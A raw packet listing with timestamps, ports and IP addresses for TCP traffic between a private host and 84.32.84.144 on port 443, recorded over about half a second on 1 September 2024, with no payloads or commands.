Sep 1, 2024 18:28:00.561261892 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.561292887 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.561480999 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.561528921 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.561662912 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.561691046 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.561709881 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.561714888 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.561729908 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.561935902 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.561984062 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.561990976 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.562031031 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.562318087 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.562350988 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.562366962 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.562371969 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.562382936 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.562424898 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.562429905 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.562727928 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.562781096 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.562784910 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.562825918 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.562925100 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.562948942 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.562964916 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.562969923 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.562995911 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.563008070 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.563276052 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.563325882 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.563477993 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.563524961 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.564286947 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.564338923 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.564363003 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.564404964 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.564632893 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.564663887 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.564677000 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.564681053 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.564697981 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.564717054 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.565167904 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.565222979 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.565318108 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.565362930 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.565546036 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.565592051 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.565788984 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.565833092 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.565928936 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.565980911 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.566158056 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.566200018 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.566459894 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.566490889 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.566512108 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.566514969 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.566525936 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.566551924 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.566687107 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.566764116 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.566802979 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.566848993 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.567074060 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.567101955 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.567116022 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.567120075 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.567141056 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.567157984 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.604617119 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.604666948 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.604732990 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.604795933 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.978262901 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.978303909 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.978362083 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.978374958 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.978404999 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.978465080 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.978543997 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.978549004 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.978614092 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.978642941 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.978662014 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.978667974 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.978709936 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.978967905 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.979012966 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.979017973 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.979065895 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.979080915 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.979109049 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.979202032 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.979202032 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.979207993 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.979244947 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.979801893 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.979837894 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.979856968 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.979861021 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.979868889 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.979886055 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.979901075 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.979917049 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.979922056 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.979932070 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.979954958 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.979958057 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.979981899 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.979986906 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.980036020 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.980036020 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.980772972 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.980807066 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.980834961 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.980837107 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.980845928 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.980851889 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.980875969 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.980885983 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.980889082 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.980905056 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.980979919 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.980979919 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.980986118 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.981194019 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.981715918 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.981750965 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.981781006 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.981785059 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.981789112 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.981796980 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.981813908 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.981839895 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.981843948 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.981853008 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.981873035 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.981914997 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.981918097 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.981992960 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.982129097 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.982187033 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.982708931 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.982749939 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.982779980 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.982781887 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.982789993 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.982809067 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.982820988 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.982831955 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.982835054 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.982848883 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.982865095 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.982878923 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.982882023 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.982943058 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.983073950 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.983630896 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.983668089 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.983696938 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.983700037 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.983707905 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.983709097 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.983742952 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.983757019 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.983757019 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.983762026 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.983774900 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.983787060 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.983804941 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.983854055 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.983854055 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.983860016 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.984581947 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.984618902 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.984641075 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.984644890 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.984652042 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.984673023 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.984680891 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.984680891 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.984687090 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.984724045 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.984882116 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.985331059 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.985363960 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.985390902 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.985394001 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.985402107 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.985410929 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.985429049 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.985456944 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.985459089 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.985466957 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.985469103 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.985517979 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.986144066 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.986174107 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.986202002 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.986207008 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.986231089 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.986249924 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.986309052 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.986342907 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.986366987 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.986370087 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.986377954 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.986378908 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.986439943 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.986443996 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.987031937 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.987066031 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.987075090 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.987078905 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.987095118 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.987118959 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.987126112 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.987159967 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.987164974 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.987180948 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.987643957 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.987674952 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.987688065 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.987692118 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.987716913 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.987728119 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.987746954 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.987773895 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.987796068 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.987796068 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.987801075 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.987814903 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.987822056 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.987845898 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.987864971 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.987869024 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.987903118 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.987904072 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.988620043 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.988655090 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.988668919 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.988672018 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.988696098 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.988718033 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.988718033 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.988723040 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.988729954 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.988739014 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.988761902 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.988778114 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.988781929 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.988790989 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.988822937 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.988862038 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.988864899 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.989439011 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.989471912 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.989485979 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.989490986 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.989559889 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.989559889 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.989625931 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.989698887 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.989849091 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.989881992 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.989912987 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.989942074 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.989943027 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.989943027 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.989948988 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.989965916 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.989988089 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.989989042 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.990016937 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.990039110 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.990042925 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.990058899 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.990747929 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.990794897 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.990828037 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.990850925 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.990850925 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.990850925 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.990854979 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.990863085 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.990864038 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.990897894 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.990911007 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.990925074 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.990947962 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.990952969 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.990984917 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.991594076 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.991626024 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.991693974 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.991699934 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.991791010 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.991841078 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.991846085 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.991888046 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.991986990 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.992018938 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.992042065 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.992048979 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.992055893 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.992058992 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.992094040 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.992121935 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.992122889 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.992122889 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.992130041 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.992141008 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.992171049 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.992876053 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.992913008 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.992927074 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.992930889 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.992945910 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.992954969 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.992975950 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.992989063 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.992993116 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.993005991 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.993020058 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.993040085 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.993067026 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.993097067 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.993097067 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.993103981 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.993114948 CEST	56171	443	192.168.2.4	84.32.84.144
